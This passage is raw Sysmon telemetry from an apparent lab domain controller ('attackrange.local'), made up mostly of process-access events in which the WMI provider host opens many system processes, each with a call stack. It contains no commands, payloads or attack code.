ll+111bc 10341000x80000000000000002246907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA920916872CA3CF3AE80616EBE99B1,SHA256=47265E7CCD942726068B5A5919F63BC889C1C366130E1DB495FDA43727BBCD4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.562{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program 